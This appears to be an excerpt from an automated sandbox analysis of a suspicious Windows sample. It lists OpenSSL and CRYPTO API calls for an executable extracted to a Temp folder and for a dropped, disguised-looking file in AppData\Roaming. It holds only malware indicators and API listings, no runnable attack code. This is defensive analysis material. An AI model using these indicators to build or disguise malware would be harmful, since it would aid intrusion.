Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35517B7 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 16_2_00007FFDA35517B7
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA357D3C0 CRYPTO_malloc,CRYPTO_clear_free, 16_2_00007FFDA357D3C0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551A0A EVP_MD_size,EVP_CIPHER_iv_length,EVP_CIPHER_key_length,CRYPTO_clear_free,CRYPTO_malloc, 16_2_00007FFDA3551A0A
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35793D0 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock, 16_2_00007FFDA35793D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551028 EVP_PKEY_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_new,RSA_pkey_ctx_ctrl,CRYPTO_free,EVP_MD_CTX_free,EVP_MD_CTX_free, 16_2_00007FFDA3551028
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A33D0 CRYPTO_malloc,memcpy, 16_2_00007FFDA35A33D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355231A CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA355231A
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3552446 CRYPTO_free,CRYPTO_memdup,ERR_put_error, 16_2_00007FFDA3552446
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551005 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset, 16_2_00007FFDA3551005
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA358F2C0 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA358F2C0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35AF2D0 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse, 16_2_00007FFDA35AF2D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35523DD CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA35523DD
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3587270 CRYPTO_free, 16_2_00007FFDA3587270
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551253 CRYPTO_free, 16_2_00007FFDA3551253
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3597320 CRYPTO_free,CRYPTO_strndup, 16_2_00007FFDA3597320
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35517A3 CRYPTO_free, 16_2_00007FFDA35517A3
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3587310 CRYPTO_free,CRYPTO_free, 16_2_00007FFDA3587310
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3552144 EVP_MD_CTX_new,EVP_MD_CTX_copy_ex,CRYPTO_memcmp,memcpy,memcpy, 16_2_00007FFDA3552144
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA359B2E0 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup, 16_2_00007FFDA359B2E0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35AD230 OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,CRYPTO_memcmp,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA35AD230
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35831F0 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free, 16_2_00007FFDA35831F0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355207C CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset, 16_2_00007FFDA355207C
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35524D7 CRYPTO_malloc,ERR_put_error,memcpy,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA35524D7
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA358F080 CRYPTO_realloc, 16_2_00007FFDA358F080
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35523EC CRYPTO_free,CRYPTO_malloc,memcmp,CRYPTO_memdup, 16_2_00007FFDA35523EC
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3567093 ERR_put_error,CRYPTO_free,CRYPTO_strdup, 16_2_00007FFDA3567093
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3597090 CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA3597090
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355228E CRYPTO_free, 16_2_00007FFDA355228E
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3585120 CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,ERR_put_error,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup, 16_2_00007FFDA3585120
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355191F ERR_put_error,memcpy,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,OPENSSL_sk_value,CRYPTO_dup_ex_data,BIO_ctrl,BIO_ctrl,BIO_up_ref,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup, 16_2_00007FFDA355191F
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3552400 CRYPTO_malloc,ERR_put_error,CRYPTO_free, 16_2_00007FFDA3552400
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3587770 CRYPTO_free, 16_2_00007FFDA3587770
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551847 CRYPTO_free, 16_2_00007FFDA3551847
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551859 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_size, 16_2_00007FFDA3551859
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356D820 CRYPTO_THREAD_run_once, 16_2_00007FFDA356D820
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35510A5 CRYPTO_zalloc,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_malloc,memcpy,CRYPTO_malloc,memcpy,ERR_put_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup, 16_2_00007FFDA35510A5
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35676D0 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free, 16_2_00007FFDA35676D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35524AF CRYPTO_free,CRYPTO_malloc,memcpy, 16_2_00007FFDA35524AF
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA357F730 CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 16_2_00007FFDA357F730
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35836F0 CRYPTO_zalloc,ERR_put_error,_time64,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free, 16_2_00007FFDA35836F0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35BB5C0 memset,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_put_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset, 16_2_00007FFDA35BB5C0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35AF5D0 EVP_PKEY_get0_RSA,RSA_size,RSA_size,CRYPTO_malloc,RAND_priv_bytes,CRYPTO_free, 16_2_00007FFDA35AF5D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35518C5 ERR_put_error,CRYPTO_free,CRYPTO_strdup, 16_2_00007FFDA35518C5
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35B7650 CRYPTO_free,CRYPTO_malloc,ERR_put_error, 16_2_00007FFDA35B7650
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3579630 ERR_put_error,ERR_put_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_put_error,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_new_ex_data, 16_2_00007FFDA3579630
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551C44 X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free, 16_2_00007FFDA3551C44
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551B04 CRYPTO_malloc,CRYPTO_mem_ctrl,OPENSSL_sk_find,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,OPENSSL_sk_push,CRYPTO_mem_ctrl,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error, 16_2_00007FFDA3551B04
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35874D0 CRYPTO_free, 16_2_00007FFDA35874D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35518BB CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset, 16_2_00007FFDA35518BB
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3569480 ASN1_item_d2i,ERR_put_error,ASN1_item_free,memcpy,_time64,X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ASN1_item_free, 16_2_00007FFDA3569480
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355141F EVP_PKEY_get1_tls_encodedpoint,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 16_2_00007FFDA355141F
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3587460 CRYPTO_free, 16_2_00007FFDA3587460
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3559540 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free, 16_2_00007FFDA3559540
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A1520 CRYPTO_free, 16_2_00007FFDA35A1520
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35AB530 CRYPTO_memcmp, 16_2_00007FFDA35AB530
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3571BD0 CRYPTO_free,CRYPTO_strdup, 16_2_00007FFDA3571BD0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3557BD0 CRYPTO_free, 16_2_00007FFDA3557BD0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551ABE CONF_parse_list,CRYPTO_malloc,ERR_put_error,memcpy,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA3551ABE
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3589B90 CRYPTO_memcmp, 16_2_00007FFDA3589B90
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551870 CRYPTO_free,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA3551870
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3552095 CRYPTO_free,_time64,CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_Digest,EVP_MD_size,CRYPTO_free, 16_2_00007FFDA3552095
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356FB30 CRYPTO_zalloc,ERR_put_error,CRYPTO_free, 16_2_00007FFDA356FB30
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355101E EVP_PKEY_free,BN_num_bits,BN_bn2bin,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_clear_free, 16_2_00007FFDA355101E
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551686 CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA3551686
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35AFAF0 BN_bin2bn,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup, 16_2_00007FFDA35AFAF0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA358FAF0 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA358FAF0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551663 CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA3551663
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355215D CRYPTO_free,CRYPTO_malloc,RAND_bytes, 16_2_00007FFDA355215D
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551D8E BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup, 16_2_00007FFDA3551D8E
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551695 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 16_2_00007FFDA3551695
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35758A7 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 16_2_00007FFDA35758A7
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551F6E CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA3551F6E
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551C0D CRYPTO_free,CRYPTO_strdup, 16_2_00007FFDA3551C0D
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355125D BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 16_2_00007FFDA355125D
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355193A CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA355193A
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355218F EVP_MD_CTX_new,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestSignInit,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,EVP_DigestSign,BUF_reverse,CRYPTO_free,EVP_MD_CTX_free,CRYPTO_free,EVP_MD_CTX_free, 16_2_00007FFDA355218F
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356BFB0 CRYPTO_zalloc,ERR_put_error,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free, 16_2_00007FFDA356BFB0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3569FB0 CRYPTO_free,CRYPTO_strndup, 16_2_00007FFDA3569FB0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3557F80 CRYPTO_zalloc,ERR_put_error, 16_2_00007FFDA3557F80
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A1F80 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy, 16_2_00007FFDA35A1F80
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355405B BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,BIO_set_init,BIO_clear_flags,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init, 16_2_00007FFDA355405B
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA358A050 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 16_2_00007FFDA358A050
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3559FF0 CRYPTO_malloc,memset,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA3559FF0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355DFF0 CRYPTO_free, 16_2_00007FFDA355DFF0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3597EC7 CRYPTO_clear_free, 16_2_00007FFDA3597EC7
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3565E80 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free, 16_2_00007FFDA3565E80
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551CD5 CRYPTO_malloc,COMP_expand_block, 16_2_00007FFDA3551CD5
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356DE70 COMP_zlib,CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl, 16_2_00007FFDA356DE70
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35BBF20 SRP_Calc_u,BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free,CRYPTO_clear_free,BN_clear_free, 16_2_00007FFDA35BBF20
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551F01 CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_clear_free, 16_2_00007FFDA3551F01
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551E6A CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow,CRYPTO_free, 16_2_00007FFDA3551E6A
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA358FDC0 CRYPTO_free,CRYPTO_free, 16_2_00007FFDA358FDC0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356FDA0 strncmp,strncmp,strncmp,strncmp,ERR_put_error,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,ERR_put_error,strncmp,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free, 16_2_00007FFDA356FDA0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356DD80 CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl, 16_2_00007FFDA356DD80
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35516E5 CRYPTO_zalloc, 16_2_00007FFDA35516E5
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355150A CRYPTO_free,CRYPTO_malloc,ERR_put_error,memcpy, 16_2_00007FFDA355150A
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3557E20 CRYPTO_zalloc,ERR_put_error, 16_2_00007FFDA3557E20
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3589E30 CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA3589E30
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551F28 CRYPTO_free,CRYPTO_malloc,memcpy, 16_2_00007FFDA3551F28
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35512E4 EVP_MD_size,RAND_bytes,_time64,CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA35512E4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35520F4 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock, 16_2_00007FFDA35520F4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA359FC60 CRYPTO_free,CRYPTO_free,CRYPTO_strndup, 16_2_00007FFDA359FC60
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3573D40 CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA3573D40
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3557D20 CRYPTO_free, 16_2_00007FFDA3557D20
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551104 EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 16_2_00007FFDA3551104
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35522CA ERR_put_error,CRYPTO_free,CRYPTO_strdup, 16_2_00007FFDA35522CA
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A7D00 CRYPTO_memcmp, 16_2_00007FFDA35A7D00
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35524D2 OPENSSL_sk_new_null,d2i_X509,CRYPTO_free,OPENSSL_sk_push,OPENSSL_sk_num,CRYPTO_memcmp,CRYPTO_free,X509_free,OPENSSL_sk_pop_free,OPENSSL_sk_value,X509_get0_pubkey,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free, 16_2_00007FFDA35524D2
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932D3410 ERR_put_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once, 24_2_00007FFD932D3410
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C01F0 EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp,strncmp,strncmp,strncmp,strncmp,strncmp, 24_2_00007FFD932C01F0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1005 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset, 24_2_00007FFD932B1005
